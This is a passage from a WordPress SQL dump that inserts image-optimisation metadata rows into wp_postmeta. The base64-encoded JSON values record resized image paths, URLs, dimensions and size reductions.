LCJpZCI6MTk1N31d'); 
INSERT INTO `wp_postmeta` VALUES (28922, 1956, 'wpfc_optimisation_reduction', '2764409'); 
INSERT INTO `wp_postmeta` VALUES (28923, 1956, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLmpwZyIsIndpZHRoIjozODg4LCJoZWlnaHQiOjI1OTIsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFkuanBnIiwicmVkdWN0aW9uIjoyNzY0Mzk5LCJ0aW1lIjoxNDgzNTUwMTk2LCJpZCI6IjE5NTYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDE5OCwiaWQiOjE5NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMjAxLCJpZCI6MTk1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTAyMDQsImlkIjoxOTU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMjA4LCJpZCI6MTk1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTAyMTEsImlkIjoxOTU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDIxMywiaWQiOjE5NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMjE1LCJpZCI6MTk1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FbGFzdG9tZXItRVBPWFktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTAyMTgsImlkIjoxOTU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRWxhc3RvbWVyLUVQT1hZLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMjIxLCJpZCI6MTk1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS01MTB4MzQwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS01MTB4MzQwLmpwZyIsIndpZHRoIjoiNTEwIiwiaGVpZ2h0IjoiMzQwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VsYXN0b21lci1FUE9YWS01MTB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDIyNCwiaWQiOjE5NTZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28924, 1955, 'wpfc_optimisation_reduction', '14663'); 
INSERT INTO `wp_postmeta` VALUES (28925, 1955, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTIuanBnIiwid2lkdGgiOjU3NjAsImhlaWdodCI6Mzg0MCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MDIyOCwiaWQiOiIxOTU1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU2MiwidGltZSI6MTQ4MzU1MDIzMSwiaWQiOjE5NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNTMxLCJ0aW1lIjoxNDgzNTUwMjM1LCJpZCI6MTk1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0MTEsInRpbWUiOjE0ODM1NTAyMzksImlkIjoxOTU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo3NzcyLCJ0aW1lIjoxNDgzNTUwMjQzLCJpZCI6MTk1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQyOCwidGltZSI6MTQ4MzU1MDI0NywiaWQiOjE5NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MTIsInRpbWUiOjE0ODM1NTAyNTAsImlkIjoxOTU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDMwLCJ0aW1lIjoxNDgzNTUwMjUzLCJpZCI6MTk1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExMTQsInRpbWUiOjE0ODM1NTAyNTcsImlkIjoxOTU1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo0NTYsInRpbWUiOjE0ODM1NTAyNjAsImlkIjoxOTU1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMi01MTB4MzQwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTItNTEweDM0MC5qcGciLCJ3aWR0aCI6IjUxMCIsImhlaWdodCI6IjM0MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yLTUxMHgzNDAuanBnIiwicmVkdWN0aW9uIjo1NDcsInRpbWUiOjE0ODM1NTAyNjQsImlkIjoxOTU1fV0='); 
INSERT INTO `wp_postmeta` VALUES (28926, 1952, 'wpfc_optimisation_reduction', '2064087'); 
INSERT INTO `wp_postmeta` VALUES (28927, 1952, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUuanBnIiwid2lkdGgiOjM1MDQsImhlaWdodCI6MjMzNiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUuanBnIiwicmVkdWN0aW9uIjoyMDY0MDc3LCJ0aW1lIjoxNDgzNTUwMjc2LCJpZCI6IjE5NTIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDI3OSwiaWQiOjE5NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMjgyLCJpZCI6MTk1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTAyODYsImlkIjoxOTUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMjkwLCJpZCI6MTk1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1Ym